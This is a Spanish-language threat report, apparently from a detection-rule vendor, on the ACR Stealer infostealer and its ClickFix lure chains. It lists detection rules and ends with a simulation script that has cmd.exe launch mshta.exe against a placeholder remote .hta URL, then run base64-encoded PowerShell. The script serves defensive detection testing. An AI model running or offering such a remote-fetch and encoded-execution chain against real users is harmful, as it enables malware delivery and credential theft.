ACR Stealer: Dos Cadenas de Intrusión Observadas Durante Aumento de Actividad de Amenazas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
ACR Stealer es una familia de malware que roba información utilizando señuelos de ingeniería social de estilo ClickFix para atacar entornos empresariales. El malware opera a través de dos cadenas principales de infección: una que depende de cargas útiles entregadas por WebDAV con cargadores de Python y comando y control basado en blockchain, y otra que utiliza MSHTA con entrega de cargas útiles esteganográficas. Su objetivo principal es robar credenciales de navegadores, tokens de autenticación y documentos sensibles.
Investigación
Microsoft Defender Experts observó un aumento de actividad entre finales de abril y mediados de junio de 2026. La investigación identificó dos caminos de ejecución separados: una campaña basada en disco que involucra Python y tareas programadas, y una campaña sin archivos que utiliza MSHTA y ejecución de shellcode en memoria. Los analistas también documentaron métodos avanzados de evasión, incluyendo modificación de marcas de tiempo, PowerShell ofuscado y resolutores de caída muertos respaldados por blockchain.
Mitigación
Las organizaciones deben capacitar a los usuarios para reconocer los mensajes de ClickFix y restringir la ejecución de scripts no confiables a través del control de aplicaciones. Reducir la exposición a la publicidad malintencionada y aplicar filtros web puede ayudar a interrumpir los intentos de acceso inicial. Fortalecer los puntos finales limitando la dependencia de credenciales almacenadas en el navegador y aplicando la autenticación multifactor también es esencial para reducir el riesgo de robo de credenciales.
Respuesta
Si se detecta esta actividad, los dispositivos afectados deben ser aislados inmediatamente y todas las credenciales y tokens potencialmente comprometidos deben ser rotados. Los tokens de sesión deben ser revocados y los investigadores deben revisar las conexiones salientes a recursos compartidos remotos o servicios de alojamiento de imágenes sospechosos. EDR en modo bloqueo debe ser utilizado para contener la amenaza y eliminar eficientemente los artefactos maliciosos.
Flujo de Ataque
Detecciones
Comportamiento de Evasión de Defensa de MSHTA LOLBAS Sospechoso mediante Detección de Comandos Asociados (vía process_creation)
Ver
LOLBAS Conhost (vía cmdline)
Ver
Tarea Programada a través de Objeto COM (vía powershell)
Ver
Descubrimiento de Información del Sistema Posible Usando el Módulo Wmi Powershell (vía powershell)
Ver
Detección de PowerShell Ofuscado y Tareas Programadas Haciéndose Pasar por Actualizaciones de Software [Windows Powershell]
Ver
Detección de Ejecución de ACR Stealer mediante Señuelos ClickFix [Creación de Procesos de Windows]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa y Comandos del Ataque: El adversario apunta a un usuario con un falso ‘error del navegador’ (ClickFix). Una vez que el usuario copia y pega el comando en un terminal,
cmd.exese invoca. El comando instruye amshta.exepara acceder a una URL remota y recuperar un script malicioso. Para evadir más fácilmente la detección de cadenas simples, el script utilizapowershell.execon un comando codificado (-Enc) para descargar y ejecutar el malware ACR Stealer en memoria, evitando el escaneo tradicional basado en archivos. -
Script de Prueba de Regresión:
# Simulación de Cadena ClickFix de ACR Stealer # Paso 1: Simular el envoltorio cmd.exe # Paso 2: Invocar mshta.exe con una URL # Paso 3: Seguido de un comando PowerShell codificado $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulando Ejecución de Carga Útil de ACR Stealer'")) Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand" -
Comandos de Limpieza:
# No se crean archivos persistentes en esta simulación, pero asegúrese de que no queden procesos huérfanos Stop-Process -Name "mshta" -ErrorAction SilentlyContinue Stop-Process -Name "powershell" -ErrorAction SilentlyContinue